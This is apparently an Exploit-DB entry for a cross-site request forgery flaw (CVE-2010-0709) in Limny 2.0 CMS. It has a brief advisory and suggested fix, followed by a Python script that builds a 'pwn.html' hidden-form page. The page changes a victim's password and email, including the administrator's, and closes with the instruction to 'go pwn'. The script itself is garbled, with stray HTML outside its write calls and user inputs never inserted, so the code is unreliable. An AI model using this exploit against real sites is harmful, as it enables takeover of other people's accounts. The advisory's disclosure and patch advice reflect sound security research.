Limny 2.0 Change Email and Password - CSRF Exploit

EDB-ID: 11477 CVE: 2010-0709 OSVDB-ID: 62389
Verified: Author: Luis Santana Published: 2010-02-16
Download Exploit: Source Raw Download Vulnerable App: N/A
:Limny 2.0 Change Pass CSRF   :  
/Discovered By:              \ 
|Luis Santana                 |

The Limny 2.0 CMS is vulnerable to a Cross-Site-Request Forgery exploit which allows for a malicious attacker to change the password, and email address, of any user, including the administrator.

Product Information
Product/Script: Limny CMS
Affected Version: 2.0

Vulnerability Type: CSRF
Security Risk: High

Vendor URL:
Product/Script Demo:

Vendor Status: Informed
Patch/Fix Status:
Advisory Timeline: 02/16/10 : Vulnerability found, PoC created and vendor contacted
		              Update: Vendor has started working on patch.
                              Update: A Patch has been created

Advisory URL:

Product Description
Limny is a powerful, module-based and lightweight CMS. It is programmed in PHP and uses MySQL database. 

Vulnerability Details
By crafting a simple hidden form webpage with a simple javascript form auto-submitter hidden inside of an iframe an attacker is able to change the password, and email address of any user.

Proof of Concept
See included .zip file for unweaponized (you need to click the "Save" button for the exploit to launch) PoC

Patch/Fix Suggestion(s)
Implementing form cookies and checking for HTTP Referer would provide an adequate means of patching this vulnerability.

Security Risk
This vulnerability is estimated to have a HIGH security risk.

The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team

Limny 2.0 Change Email & Password CSRF Exploit
Discovered By: Luis Santana
Script By: Luis Santana

Shoutz to the community, Shardy, Rage, Xires and Stacy

__version__= 1.0

p = open("pwn.html", "w")
<title>Limny2.0 Change Password & Email CSRF by Luis Santana
<h1>Press Save and Pwn Away</h1>
base = str(input("What is the target website? "))
p.write('<form name="profile" action="')
p.write('''/?q=user" method="post" enctype="multipart/form-data">
password = str(input("What password do you want? "))
<td><input name="pass" type="hidden" maxlength="64" value="''')
p.write('''" /></td></tr>
<td><input name="confirmpass" type="hidden" maxlength="64" value="''')
p.write('''" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr>
<tr><td>Theme:</td><td><select name="theme"><option value="gray" selected="selected">Gray</option></select></td></tr>
<tr><td>Language:</td><td><select name="language"><option value="english" selected="selected">English</option></select></td></tr>
<td><input name="email" type="hidden" maxlength="128" value="'''
email = str(input("What email do you want? "))
p.write('" /></td></tr>')
#This will change the email address of the administrator but there is no way to get around it
p.write('''<td><input name="picture" type="hidden" value="" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr><tr><td colspan="2"><button name="submit" type="submit">Save</button></table></form>
print("pwn.html has been created successfully! Upload this file to your webserver and then go pwn")